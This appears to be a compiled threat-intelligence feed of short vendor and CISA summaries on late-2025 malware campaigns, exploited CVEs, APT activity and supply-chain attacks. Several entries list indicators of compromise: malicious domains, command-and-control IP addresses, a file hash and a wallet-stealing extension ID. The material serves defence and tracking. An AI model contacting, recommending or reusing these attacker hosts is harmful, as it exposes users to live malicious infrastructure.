~Cofense~ Threat actors exploit the high email volume and shopper urgency of the holiday season for widespread phishing campaigns. - IOCs: (None identified) - #BlackFriday #Phishing #ThreatIntel

~Anyrun~ November's landscape was dominated by multi-stage loaders like XWorm and JSGuLdr delivering stealers and backdoors via in-memory execution. - IOCs: drive. google. com - #JSGuLdr #Malware #ThreatIntel #XWorm

~Zscaler~ Water Gamayun APT exploits CVE-2025-26633 via lookalike domains to deliver multi-stage PowerShell payloads. - IOCs: belaysolutions[. ]link, 103. 246. 147. 17 - #CVE202526633 #ThreatIntel #WaterGamayun

~Socket~ Numerous NPM packages compromised via account takeover to steal credentials from CI/CD environments and self-propagate. - IOCs: (None identified) - #Malware #NPM #SupplyChain #ThreatIntel

~Cisa~ CISA released seven new advisories detailing security issues and vulnerabilities in various Industrial Control Systems products. - IOCs: (None identified) - #CISA #ICS #ThreatIntel #Vulnerability

~Sentinelone~ SentinelOne released an open-source Synapse power-up for Validin to enhance threat infrastructure discovery and pivoting. - IOCs: (None identified) - #Synapse #ThreatHunting #ThreatIntel

~Paloalto~ Malicious LLMs like WormGPT & KawaiiGPT are lowering the cybercrime barrier by automating malware & phishing creation. - IOCs: fakebankverify[. ]com - #AI #Malware #ThreatIntel

~Cisa~ Threat actors are using commercial spyware and social engineering to compromise mobile messaging apps like Signal and WhatsApp. - IOCs: (None identified) - #MobileSecurity #Spyware #ThreatIntel

~Morphisec~ Russian-linked actors distribute StealC V2 infostealer via malicious .blend files on 3D model sharing sites. - IOCs: 178. 16. 53. 64, 104. 245. 241. 157, 178. 16. 54. 69 - #Blender #StealC #ThreatIntel

~Socket~ Socket now offers real-time webhook events for security alert changes, enabling automated workflows and faster response. - IOCs: (None identified) - #DevSecOps #SupplyChain #ThreatIntel

~Socket~ ENISA is now a top-level CVE Root, centralizing vulnerability management and reporting for the entire European Union. - IOCs: (None identified) - #CVE #ENISA #EU #ThreatIntel

~Cisa~ CISA added an actively exploited Oracle Fusion Middleware authentication vulnerability (CVE-2025-61757) to its KEV catalog. - IOCs: CVE-2025-61757 - #CVE202561757 #Oracle #ThreatIntel

~Socket~ Socket now scans OpenVSX extensions for malicious behavior, backdoors, and credential theft to secure the developer supply chain. - IOCs: piiithon-linter extension - #OpenVSX #SupplyChain #ThreatIntel #VSCode

~Sophos~ A malware campaign targets WhatsApp users with ZIP files to deploy the Astaroth (Guildma) banking trojan. - IOCs: manoelimoveiscaioba. com, varegjopeaks. com, docsmoonstudioclayworks. online - #Astaroth #Malware #ThreatIntel #WhatsApp

~Cisa~ CISA has released six new advisories detailing security issues and vulnerabilities in various Industrial Control Systems (ICS) products. - IOCs: (None identified) - #CISA #ICS #ThreatIntel #Vulnerability

~Zscaler~ A critical RCE (CVSS 9.8) in the Windows Graphics Component is exploitable via a malicious JPEG image. - IOCs: CVE-2025-50165 - #CVE202550165 #ThreatIntel #Windows

~Socket~ Socket now provides supply chain security and SBOM generation for projects using the Bun and vlt JavaScript package managers. - IOCs: (None identified) - #DevSecOps #JavaScript #SupplyChain #ThreatIntel

~Mandiant~ APT24 targets Taiwanese orgs with BADAUDIO malware via supply chain attacks, strategic web compromises, and phishing. - IOCs: clients. brendns. workers. dev, wispy. geneva. workers. dev, www. cundis. com - #APT24 #BADAUDIO #ThreatIntel

~Trendmicro~ Trend Micro now offers one-click managed IPS rule groups natively within AWS Network Firewall. - IOCs: (None identified) - #AWS #CloudSecurity #IPS #ThreatIntel

~Cisa~ CISA added the actively exploited Google Chromium V8 vulnerability (CVE-2025-13223) to its KEV catalog, requiring federal agencies to patch. - IOCs: CVE-2025-13223 - #CISA #CVE202513223 #ThreatIntel

~Varonis~ Cybercrime is shifting to a subscription-based 'as-a-service' model, lowering the barrier for attackers to access advanced tools and services. - IOCs: (None identified) - #CaaS #Cybercrime #ThreatIntel

~Socket~ Socket introduces Certified Patches to fix vulnerable dependencies in-place without requiring risky package upgrades. - IOCs: (None identified) - #Patching #SupplyChain #ThreatIntel #Vulnerability

~Cofense~ Threat actors are abusing legitimate URL shorteners like t.ly, tinyurl.com, and goo.su to bypass security and deliver malware and phishing campaigns. - IOCs: t. ly, tinyurl. com, goo. su - #Malware #Phishing #ThreatIntel

~Cisa~ CISA released a guide for ISPs and network defenders to mitigate risks from malicious Bulletproof Hosting (BPH) providers. - IOCs: (None identified) - #BPH #CISA #ThreatIntel

~Eset~ PlushDaemon deploys the EdgeStepper network implant to hijack software updates via adversary-in-the-middle attacks. - IOCs: 8. 212. 132. 120, 47. 242. 198. 250, ds20221202. dsc. wcsset. com - #EdgeStepper #PlushDaemon #ThreatIntel

~Anyrun~ Threat actors abuse legitimate Windows binaries (e.g., rundll32, certutil) to execute malicious code and evade detection. - IOCs: (None identified) - #DefenseEvasion #LOLBin #ThreatIntel

~Cisa~ CISA adds actively exploited Fortinet FortiWeb OS command injection vulnerability (CVE-2025-58034) to its KEV catalog. - IOCs: CVE-2025-58034 - #CVE202558034 #Fortinet #ThreatIntel

~Socket~ Socket has released a beta for its function-level vulnerability reachability analysis tool for Ruby to help developers prioritize exploitable CVEs. - IOCs: (None identified) - #DevSecOps #Ruby #ThreatIntel #VulnerabilityManagement

~Cisa~ CISA released six new advisories detailing vulnerabilities in various Industrial Control Systems (ICS) products. - IOCs: (None identified) - #CISA #ICS #ThreatIntel #Vulnerability

~Morphisec~ New Tuoni C2 campaign uses an AI-assisted loader with steganography to deliver stealthy in-memory payloads. - IOCs: 206. 81. 10. 0, kupaoquan. com, udefined30. domainofhonour40. xyz - #Malware #ThreatIntel #TuoniC2

~Trendmicro~ Ransomware is evolving to target AWS S3 buckets by exploiting misconfigurations and native features like SSE-C to encrypt or delete data. - IOCs: (None identified) - #AWS #Ransomware #S3 #ThreatIntel

~Socket~ Massive spam campaign floods npm to abuse the TEA Protocol crypto scheme; it is not a worm and poses no direct security threat. - IOCs: tea. xyz - #Spam #ThreatIntel #npm

~Socket~ Malicious npm packages use Adspect cloaking to fingerprint users and redirect victims to malicious sites while evading researchers. - IOCs: association-google. xyz, appprotector. online, protectorapp. online - #Malware #ThreatIntel #npm

~Sentinelone~ New LLM-enabled malware generates code at runtime but can be detected by hunting for hardcoded API keys and prompts. - IOCs: PromptLock, PROMPTSTEAL, MalTerminal - #AI #Malware #ThreatIntel

~Mandiant~ Iran-nexus actor UNC1549 targets aerospace & defense via third-party compromise, phishing, and custom malware for espionage. - IOCs: 104. 194. 215. 88, 13. 60. 50. 172, 167. 172. 137. 208 - #Espionage #ThreatIntel #UNC1549

~Socket~ PyPI has expanded its tokenless Trusted Publishing feature to support GitLab Self-Managed instances, enhancing software supply chain security. - IOCs: (None identified) - #GitLab #PyPI #SupplyChainSecurity #ThreatIntel

~Paloalto~ Large-scale campaigns impersonate popular software to deliver Gh0st RAT to Chinese-speaking users using increasingly evasive TTPs. - IOCs: 156. 251. 25. 112, 103. 181. 134. 138, 95. 173. 197. 195 - #Gh0stRAT #Malware #ThreatIntel

~Cisa~ Unauthenticated path traversal vulnerability CVE-2025-64446 in FortiWeb is actively exploited, allowing remote administrative command execution. - IOCs: CVE-2025-64446 - #CVE202564446 #Fortinet #ThreatIntel

~Trendmicro~ Threat actors are leveraging agentic AI to automate and scale sophisticated attacks, requiring enterprises to adopt AI-driven defenses. - IOCs: (None identified) - #AI #Cybercrime #ThreatIntel

~Cisa~ CISA warns of active exploitation of a Fortinet FortiWeb path traversal vulnerability (CVE-2025-64446) by adding it to the KEV catalog. - IOCs: CVE-2025-64446 - #CVE202564446 #Fortinet #ThreatIntel

~Socket~ The 'Safery: Ethereum Wallet' Chrome extension exfiltrates crypto seed phrases via Sui blockchain transactions. - IOCs: kifagusertyna@gmail[. ]com, fibemlnkopkeenmmgcfohhcdbkhgbolo - #Crypto #Malware #ThreatIntel

~Elastic~ DragonBreath APT uses new multi-stage loader RONINGLOADER to disable security tools via PPL abuse and deploy a gh0st RAT variant. - IOCs: qaqkongtiao. com - #DragonBreath #RoningLoader #ThreatIntel

~Cisa~ CISA released 18 new advisories detailing security issues and vulnerabilities in various Industrial Control Systems. - IOCs: (None identified) - #ICS #ThreatIntel #Vulnerability

~Mandiant~ Learn to use Time Travel Debugging (TTD) to analyze obfuscated .NET malware and extract an AgentTesla payload. - IOCs: 4dfe67a8f1751ce0c29f7f44295e6028ad83bb8b3a7e85f84d6e251a0d7e3076 - #MalwareAnalysis #TTD #ThreatIntel

~Cisa~ CISA and partners updated the Akira ransomware advisory with new TTPs, including the use of POORTRY and STONETOP malware. - IOCs: POORTRY, STONETOP, SystemBC - #Akira #Ransomware #ThreatIntel

~Checkpoint~ Q3 2025 saw record ransomware group fragmentation, with Qilin leading attacks and LockBit re-emerging with version 5.0. - IOCs: (None identified) - #LockBit #Qilin #Ransomware #ThreatIntel

~Trendmicro~ Lumma Stealer malware has resurged, adding browser fingerprinting to its C2 tactics for improved evasion and targeting. - IOCs: pabuloa. asia, jamelik. asia - #InfoStealer #LummaStealer #ThreatIntel

~Sophos~ Microsoft's Nov. Patch Tuesday addresses 63 vulns, including 4 critical and one actively exploited Windows Kernel flaw (CVE-2025-62215). - IOCs: CVE-2025-62215 - #CVE202562215 #Microsoft #PatchTuesday #ThreatIntel

~Socket~ The Socket team will be at Black Hat Europe and BSides London in December to discuss software supply chain security. - IOCs: (None identified) - #BSides #BlackHat #SupplyChain #ThreatIntel

~Cisa~ CISA released guidance for Emergency Directive 25-03, mandating immediate patching for critical Cisco ASA & Firepower vulnerabilities. - IOCs: CVE-2025-20333, CVE-2025-20362 - #CVE202520333 #Cisco #ThreatIntel